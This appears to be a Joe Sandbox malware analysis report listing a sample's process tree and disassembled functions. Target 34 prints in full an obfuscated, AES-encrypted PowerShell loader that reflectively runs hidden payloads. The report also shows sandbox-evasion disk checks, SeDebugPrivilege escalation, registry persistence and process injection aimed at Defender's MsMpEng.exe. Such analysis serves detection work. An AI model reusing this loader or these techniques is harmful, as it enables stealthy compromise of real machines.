MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:02:17
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase:	0x7ff6b6c60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:02:17
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	12:02:17
Start date:	12/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff6e26e0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:02:18
Start date:	12/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase:	0x7ff6f5220000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:02:21
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	12:02:21
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	12:02:21
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	12:02:22
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	12:02:23
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	12:02:23
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	12:02:24
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	12:02:24
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	12:02:24
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	12:02:27
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	12:02:27
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	12:02:27
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	12:02:28
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	12:02:28
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	12:02:29
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	12:02:29
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Imagebase:	0x7ff6b6c60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:02:29
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	12:02:30
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	12:02:31
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	12:02:31
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	12:02:32
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	12:02:33
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	12:02:34
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	12:02:35
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	12:02:35
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	12:02:36
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	12:02:36
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	12:02:36
Start date:	12/12/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22}
Imagebase:	0x7ff7d8730000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	12:02:37
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	12:02:38
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	12:02:39
Start date:	12/12/2024
Path:	C:\Windows\System32\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\spoolsv.exe
Imagebase:	0x7ff771e20000
File size:	842'752 bytes
MD5 hash:	0D4B1E3E4488E9BDC035F23E1F4FE22F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	44.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	72.9%
Total number of Nodes:	251
Total number of Limit Nodes:	30

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0000000140002D4C Relevance: 84.3, APIs: 36, Strings: 12, Instructions: 258
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002A0C: StrCpyW.SHLWAPI ref: 0000000140002A3D
Part of subcall function 0000000140002A0C: StrCatW.SHLWAPI ref: 0000000140002A4B
Part of subcall function 0000000140002A0C: GetModuleHandleW.KERNEL32 ref: 0000000140002A54
Part of subcall function 0000000140002A0C: GetCurrentProcess.KERNEL32 ref: 0000000140002A74
Part of subcall function 0000000140002A0C: K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
Part of subcall function 0000000140002A0C: CreateFileW.KERNELBASE ref: 0000000140002AB8
Part of subcall function 0000000140002A0C: CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
Part of subcall function 0000000140002A0C: MapViewOfFile.KERNELBASE ref: 0000000140002B05
Part of subcall function 0000000140002A0C: lstrcmpiA.KERNEL32 ref: 0000000140002B5B
Part of subcall function 0000000140002A0C: CloseHandle.KERNELBASE ref: 0000000140002BC7
Part of subcall function 0000000140002A0C: CloseHandle.KERNEL32 ref: 0000000140002BD0
Part of subcall function 0000000140002A0C: FreeLibrary.KERNEL32 ref: 0000000140002BD9

Part of subcall function 0000000140002A0C: VirtualProtect.KERNEL32 ref: 0000000140002B8E
Part of subcall function 0000000140002A0C: VirtualProtect.KERNEL32 ref: 0000000140002BBE

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
GetLastError.KERNEL32 ref: 0000000140002DF7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EFB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F2B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F3D
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F43
RegCreateKeyExW.KERNELBASE ref: 0000000140002F7F
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140002FA6
RegSetKeySecurity.KERNELBASE ref: 0000000140002FBF
LocalFree.KERNEL32 ref: 0000000140002FC9
RegCreateKeyExW.KERNELBASE ref: 0000000140002FFF
GetCurrentProcessId.KERNEL32 ref: 0000000140003009
RegSetValueExW.KERNELBASE ref: 0000000140003030
RegCloseKey.KERNELBASE ref: 000000014000303A
RegCloseKey.ADVAPI32 ref: 0000000140003044
CreateThread.KERNELBASE ref: 0000000140003065
GetProcessHeap.KERNEL32 ref: 000000014000306B
HeapAlloc.KERNEL32 ref: 000000014000307A
CreateThread.KERNELBASE ref: 00000001400030A8
CreateThread.KERNELBASE ref: 00000001400030C9
ShellExecuteW.SHELL32 ref: 0000000140003103
GetProcessHeap.KERNEL32 ref: 0000000140003163
HeapFree.KERNEL32 ref: 0000000140003171
SleepEx.KERNELBASE ref: 000000014000317A

Strings

SOFTWARE, xrefs: 0000000140002E1F
svc64, xrefs: 0000000140003013
kernel32.dll, xrefs: 0000000140002D68
SeDebugPrivilege, xrefs: 0000000140002DAE
SOFTWARE\$nya-config, xrefs: 0000000140002F5E
open, xrefs: 00000001400030E4
$nya-dll32, xrefs: 0000000140002E47, 0000000140002ED6
pid, xrefs: 0000000140002FDC
ntdll.dll, xrefs: 0000000140002D5C
$nya-dll64, xrefs: 0000000140002E77, 0000000140002F10
?, xrefs: 0000000140002FF3
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 0000000140002F9F

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
String ID: $nya-dll32$$nya-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$nya-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
API String ID: 3658652915-3222643892
Opcode ID: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
Instruction ID: 4f21af1d6324345a54d8493184232a85d4bbe7b60dd5b863780ff56615b54280
Opcode Fuzzy Hash: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
Instruction Fuzzy Hash: A5C1F2B2200A4086EB26DF22F8547DA37A5FB8CBD9F414116FB4A43A76DF38C589C744

Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32 ref: 000000014000189E
IsWow64Process.KERNEL32 ref: 00000001400018BA
CloseHandle.KERNELBASE ref: 00000001400018DE
OpenProcess.KERNEL32 ref: 0000000140001939
OpenProcess.KERNEL32 ref: 0000000140001958
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
PathFindFileNameW.SHLWAPI ref: 0000000140001987
lstrlenW.KERNEL32 ref: 0000000140001993
StrCpyW.SHLWAPI ref: 00000001400019AA
CloseHandle.KERNEL32 ref: 00000001400019B6
StrCmpIW.SHLWAPI ref: 00000001400019EA
NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
OpenProcessToken.ADVAPI32 ref: 0000000140001A43
GetTokenInformation.KERNELBASE ref: 0000000140001A6F
GetLastError.KERNEL32 ref: 0000000140001A79
LocalAlloc.KERNEL32 ref: 0000000140001A8C
GetTokenInformation.KERNELBASE ref: 0000000140001AB8
GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
LocalFree.KERNEL32 ref: 0000000140001AEC
CloseHandle.KERNEL32 ref: 0000000140001B00
StrStrA.SHLWAPI ref: 0000000140001BAB
VirtualAllocEx.KERNEL32 ref: 0000000140001C15
WriteProcessMemory.KERNELBASE ref: 0000000140001C38
WaitForSingleObject.KERNEL32 ref: 0000000140001C79
GetExitCodeThread.KERNEL32 ref: 0000000140001C8F
VirtualFreeEx.KERNELBASE ref: 0000000140001CB1
CloseHandle.KERNELBASE ref: 0000000140001CC2
CloseHandle.KERNEL32 ref: 0000000140001CCB

Strings

ReflectiveDllMain, xrefs: 0000000140001BA1
@, xrefs: 0000000140001C08
MSBuild.exe, xrefs: 00000001400019D4
MsMpEng.exe, xrefs: 00000001400019C1

Memory Dump Source

Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
API String ID: 2456419452-2628171563
Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

Function 00000001400031D0 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140003230
HeapAlloc.KERNEL32 ref: 0000000140003243
K32EnumProcesses.KERNEL32 ref: 0000000140003260

Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 000000014000189E
Part of subcall function 0000000140001868: IsWow64Process.KERNEL32 ref: 00000001400018BA
Part of subcall function 0000000140001868: CloseHandle.KERNELBASE ref: 00000001400018DE
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001939
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001958
Part of subcall function 0000000140001868: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
Part of subcall function 0000000140001868: PathFindFileNameW.SHLWAPI ref: 0000000140001987
Part of subcall function 0000000140001868: lstrlenW.KERNEL32 ref: 0000000140001993
Part of subcall function 0000000140001868: StrCpyW.SHLWAPI ref: 00000001400019AA
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 00000001400019B6
Part of subcall function 0000000140001868: StrCmpIW.SHLWAPI ref: 00000001400019EA

